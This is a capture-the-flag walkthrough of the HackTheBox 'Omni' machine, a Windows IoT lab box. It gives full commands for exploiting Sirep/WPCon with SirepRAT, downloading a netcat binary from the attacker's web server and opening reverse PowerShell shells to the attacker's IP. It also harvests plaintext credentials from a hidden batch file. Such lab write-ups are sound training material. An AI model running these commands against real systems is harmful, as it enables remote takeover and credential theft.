Omni HackTheBox WalkThrough
This is Omni HackTheBox walkthrough. In this writeup, I have demonstrated step by step how I rooted to the
Omni HTB machine. Before starting let us know something about this machine. Its OS is not known hence it is categorized as
other. Given security level
easy by its maker and has been assigned IP address
First of all, connect your local machine with VPN so that you can have access to the lab machines and confirm the connectivity by pinging the IP address 10.10.10.204. If all correct then start hacking.
As usual, I began by scanning the IP address so that I could get some starting point.
Nmap [a port scanner] gave the following result.
$nmap -sV -sC -O -oN omni_scan 10.10.10.204
Nmap revealed that ports 135 and 8080 are open.
Msrpc is running on port 135 and
IIS web server is running over 8080. Ongoing to URL http://10.10.10.204:8008/ found a login page, as we have in tomcat web server and a message, which says
Windows Device Portal.
Windows Device Portal reveals that it a web server through which you can manage and configure your IoT devices remotely using web browser. It also provides advanced diagnostic tools to help you troubleshoot and view the real-time performance of your Windows device.
As I got some information about the software being used, immediately googled
Windows Device Portal exploit for available public exploits for this software. Got this article in the first page of the search results. After reading this article came to know that Windows IoT Operating System is affected with a
RCE vulnerability in which an attacker can exploit
Sirep/WPCon communications protocol to execute command on the OS without dropping payload into the OS. For more information about the exploit and it’s usage you can refer to this GitHub repository.
We have exploit let us use it to confirm whether we have Remote Code Execution or not.
$git clone https://github.com/SafeBreach-Labs/SirepRAT.git
$python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell.exe ipconfig" --v
We can clearly see we can execute OS command remotely. Therefore, to get reverse shell I dropped a netcat binary inside the public writeable folder of windows OS and then executed command to connect to our machine. You can get a list of public writable folder from this repository.
$python3 -m http.server 80 //Start python web server locally by hosting nc64.exe file
$rlwrap nc -nvlp 4321
$python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\net1.exe -Uri http://10.10.14.86/nc64.exe" --v
$python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\net1.exe 10.10.14.6 4321 -e powershell.exe" --v
Note: If you are using C:\Windows\System32\spool\drivers\color\ directory to download your binary you may get an error that ‘nc64.exe is being used by some other program’. To avoid this error you can use C:\Windows\System32\spool\ directory and rename the binary from nc64.exe to net1.exe before downloading remotely. Alternatively, follow the command as I have used.
We got a shell. Just confirmed it by running
$env:UserName (Used $env because
whoami command is not present).
Tried to access
C:\Users\ directory to list the number of users in the box but, no user is present inside the Users folder. Used command
$net user to list all the users we have.
We have two users
app. However, they are not present in their default directory. May be in some other drive? Let us check. Used
$Get-PSDrive PowerShell command to list all the drives in Omni machine.
For more info about Omni machine you can run PowerShell cmdlet
Get-PSDrive tells that omni machine has three drive namely
U. Changed the drive to U and found the users app and administrator inside the directory
U:\Users\. We can capture the user flag now.
It appears that user flag is encrypted using PowerShell function to prevent unauthorized access. Did not know how to decrypt it. Just googled
PowerShell Password Decryption got this appropriate link on first page. According to this website, user.txt can be decrypted using following method.
$UserCreds = Import-CliXml -Path U:\Users\app\user.txt
When tried to decrypt got error. This error is probably due to unauthorized access to user.txt file. Because user.txt file is owned by user app and currently, we are logged in as omni. So anyhow, we have to login using user app creds. But currently we don’t have any credential of user app. After some enumeration got directory
C:\Program Files\WindowsPowerShell\Modules\PAckageManagement\, which contain a hidden file, named
r.bat. The content of the file r.bat can be accessed by using
$type C:\'Program Files'\WindowsPowerShell\Modules\PAckageManagement\r.bat
From above file got some credentials
Since we have login panel at http://10.10.10.204:8080. Let us use credential
mesh5143 to login as user app.
Login into Portal
We are successfully logged in. Windows Device Portal (WDP) gives us facility to manage all the processes using command prompt. We can run our command using the
run command panel.
Since we have already dropped our
netcat binary [renamed to net1.exe] inside the directory
C:\Windows\System32\Spool\ so, we will use this binary to get reverse connection on our netcat listener locally. As we are now logged in as user app, our reverse shell will be of the user app privilege and we can easily decrypt the content of user.txt file. So ran below command to get shell.
$rlwrap nc -nvlp 2345 //Run it locally to get reverse connection
$C:\Windows\System32\spool\net1.exe 10.10.14.86 2345 -e powershell.exe //on command prompt window of WDP. You can get error as below but you will find your command is executed.
Capture User Flag
$$UserCreds = Import-CliXml -Path U:\Users\app\user.txt
We also have administrator account credential from the
r.bat file. We just need to
logout from the user
app account and then login to user
administrator and follow the same steps as we did with user app. To logout from the user app just close the browser window and clear your browsing history to remove logged in cookie. And then log in using the credentials
_1nt3rn37ofTh1nGz and execute the same command as you did with user app by changing the listening port of netcat.
$rlwrap nc -nvlp 3456
$C:\Windows\System32\spool\net1.exe 10.10.14.86 3456 -e powershell.exe
We got an administrative privilege shell. So we have successfully escalated the privilege to admin user.
Capture Root Flag
#$UserCreds = Import-CliXml -Path U:\Users\administrator\root.txt
This was how I rooted Omni HackTheBox. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. For any query and suggestion related to walkthrough, feel free to contact us at [email protected].